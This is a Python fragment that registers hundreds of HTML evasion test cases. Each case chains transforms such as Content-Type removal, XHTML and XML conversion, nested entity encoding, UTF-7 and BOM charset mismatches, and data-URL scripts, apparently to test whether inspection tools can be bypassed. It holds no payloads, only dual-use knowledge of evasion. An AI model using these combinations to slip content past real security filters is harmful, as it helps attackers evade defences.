cases.append(TransformFunction("HtmlEvasion-html-118", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-119", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-120", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-121", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-122", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-123", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-124", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-125", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-126", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-127", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-128", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-129", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-130", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-131", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-132", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-133", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-134", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-135", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_xml, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
# End Content-Type based evasions
##### xml based evasions
# mix of singles and combos
parsed_as_xml_case = TransformFunction("", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_xml)
cases.append(TransformFunction("HtmlEvasion-html-200", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-201", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-202", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-203", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-204", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-205", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_dec))
cases.append(TransformFunction("HtmlEvasion-html-206", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_hex))
cases.append(TransformFunction("HtmlEvasion-html-207", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_mix))
cases.append(TransformFunction("HtmlEvasion-html-208", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_cdata))
cases.append(TransformFunction("HtmlEvasion-html-209", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-210", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-211", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix,
evasions.html.entity_encoding_cdata_mix))
cases.append(TransformFunction("HtmlEvasion-html-212", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-213", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-214", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-215", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-216", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-217", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-200", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-218", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-219", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-220", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-221", None, parsed_as_xml_case,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-222", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-223", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-224", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-225", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730)
))
cases.append(TransformFunction("HtmlEvasion-html-226", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730),
evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
))
##### End xml based evasions
##### Encoding based minimal cases
# declaring (header or BOM) as utf8/utf7 and sending as utf16le/utf16be -> infinite loop? (except when utf8 BOM + utf16le encoding)
cases.append(TransformFunction("HtmlEvasion-html-300", None, evasions.html.no_declared_encoding_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-301", None, evasions.html.no_declared_encoding_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-302", None, evasions.html.http_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-303", None, evasions.html.http_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-304", None, evasions.html.http_declared_utf_16_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-305", None, evasions.html.http_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-306", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_0))
cases.append(TransformFunction("HtmlEvasion-html-307", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_1))
cases.append(TransformFunction("HtmlEvasion-html-308", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_2))
cases.append(TransformFunction("HtmlEvasion-html-309", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-310", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_4))
cases.append(TransformFunction("HtmlEvasion-html-311", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_5))
cases.append(TransformFunction("HtmlEvasion-html-312", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-313", None, evasions.html.bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-314", None, evasions.html.bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-315", None, evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-316", None, evasions.html.bom_declared_utf_16le_encoded_as_utf_16_le))
# all BOM utf7 [1,5] + encode utf_7 [0, 5i] all work, but only doing a subset so reduce number of cases
cases.append(TransformFunction("HtmlEvasion-html-317", None, evasions.html.bom_declared_utf_7_variant_1_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-318", None, evasions.html.bom_declared_utf_7_variant_2_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-319", None, evasions.html.bom_declared_utf_7_variant_3_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-320", None, evasions.html.bom_declared_utf_7_variant_4_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-321", None, evasions.html.bom_declared_utf_7_variant_5_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-322", None, evasions.html.bom_declared_utf_7_variant_1_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-323", None, evasions.html.bom_declared_utf_7_variant_2_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-324", None, evasions.html.bom_declared_utf_7_variant_3_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-325", None, evasions.html.bom_declared_utf_7_variant_4_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-326", None, evasions.html.bom_declared_utf_7_variant_5_encoded_as_utf_7_5_i))
# # IE mode <= 9: BOM has precedence over HTTP declaration (except when BOM = UTF-7 apparently, weird stuff happens)
base = TransformFunction("", None, evasions.html.xua_meta_change_value_8, evasions.html.xua_move_meta_to_headers)
cases.append(TransformFunction("HtmlEvasion-html-327", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-328", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-329", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-330", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-331", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-332", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-333", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-334", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-335", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-336", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-337", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-338", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-339", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-340", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-341", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-342", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-343", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-344", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-345", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-346", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-347", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-348", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-349", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-350", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-351", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
# IE mode > 9: HTTP declaration has precedence over BOM
base = TransformFunction("", None, evasions.html.xua_meta_change_value_10, evasions.html.xua_move_meta_to_headers)
cases.append(TransformFunction("HtmlEvasion-html-360", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16le_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-361", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16be_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-362", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-363", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-364", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_16be_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-365", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-366", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-367", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-368", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_16be_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-369", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-370", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-371", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-372", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_16le_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-373", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-374", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-375", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-376", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16le_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-377", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-378", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_7_5_i))
##### End Encoding based minimal cases
simple_index = len(cases)
################### All combos
################## IE = 8 combo path
base = evasions.html.remove_html_comments
cases.append(TransformFunction("HtmlEvasion-html-500", None, base, evasions.html.remove_content_type_http_equiv_meta))
cases.append(TransformFunction("HtmlEvasion-html-501", None, cases[-1], evasions.html.xua_meta_change_value_8))
cases.append(TransformFunction("HtmlEvasion-html-502", None, cases[-1], evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-503", None, cases[-1], evasions.html.script_language_add_encode))
cases.append(TransformFunction("HtmlEvasion-html-504", None, cases[-1], evasions.html.encoded_script))
base = cases[-1]
# path1
cases.append(TransformFunction("HtmlEvasion-html-505", None, cases[-1], evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-506", None, cases[-1], evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-507", None, cases[-1], evasions.html.meta_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-508", None, cases[-1], evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-509", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-510", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-511", None, cases[-1], evasions.html.insert_many_slash_after_opening_tag_names.parameterize(N=783)))
cases.append(TransformFunction("HtmlEvasion-html-512", None, cases[-1], evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_16_be))
# path2
cases.append(TransformFunction("HtmlEvasion-html-513", None, base, evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-514", None, cases[-1], evasions.html.meta_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-515", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-516", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-517", None, cases[-1], evasions.html.move_body_to_nested_div))
cases.append(TransformFunction("HtmlEvasion-html-518", None, cases[-1], evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
##################
################### IE = 9 combo path
# data url path
base = TransformFunction("", None, evasions.html.remove_html_comments, evasions.html.remove_content_type_http_equiv_meta)
cases.append(TransformFunction("HtmlEvasion-html-600", None, base, evasions.html.xua_meta_change_value_9))
cases.append(TransformFunction("HtmlEvasion-html-601", None, base, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-602", None, cases[-1], evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url))
cases.append(TransformFunction("HtmlEvasion-html-603", None, cases[-1], evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-604", None, cases[-1], evasions.html.meta_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-605", None, cases[-1], evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
parsed_as_xml_case = cases[-1]
# XML case path
cases.append(TransformFunction("HtmlEvasion-html-606", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-607", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-608", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-609", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-610", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-611", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_dec))
# cases.append(TransformFunction("HtmlEvasion-html-612", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_hex))
# cases.append(TransformFunction("HtmlEvasion-html-613", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-614", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_cdata))
# cases.append(TransformFunction("HtmlEvasion-html-615", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-616", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-617", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_mix,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-618", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-619", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-620", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-621", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-622", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-623", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-624", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-625", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-626", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-627", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-628", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-629", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-630", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-631", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-632", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730)
))
# data url + ... + entity_encoding_internal_parameter_entity_declaration_mix -> too large value ?
# cases.append(TransformFunction("HtmlEvasion-html-633", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_mix,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
# min_value_length=2),
# evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
# number_of_nested=99730),
# evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
# ))
cases.append(TransformFunction("HtmlEvasion-html-634", None, cases[-1], evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_8))
###################
################## IE = 10 combo path
base = TransformFunction("", None, evasions.html.remove_html_comments, evasions.html.remove_content_type_http_equiv_meta)
cases.append(TransformFunction("HtmlEvasion-html-700", None, base, evasions.html.xua_meta_change_value_10))
cases.append(TransformFunction("HtmlEvasion-html-701", None, base, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-702", None, cases[-1], evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-703", None, cases[-1], evasions.html.meta_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-704", None, cases[-1], evasions.html.attributes_reverse))
base = cases[-1]
# path 1 (html)
cases.append(TransformFunction("HtmlEvasion-html-705", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-706", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-707", None, cases[-1], evasions.html.move_body_to_nested_div_with_children.parameterize(N=1041, M=1000000)))
cases.append(TransformFunction("HtmlEvasion-html-708", None, cases[-1], evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_7_5_i))
# path 2 (xml)
cases.append(TransformFunction("HtmlEvasion-html-709", None, base, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
parsed_as_xml_case = cases[-1]
cases.append(TransformFunction("HtmlEvasion-html-710", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
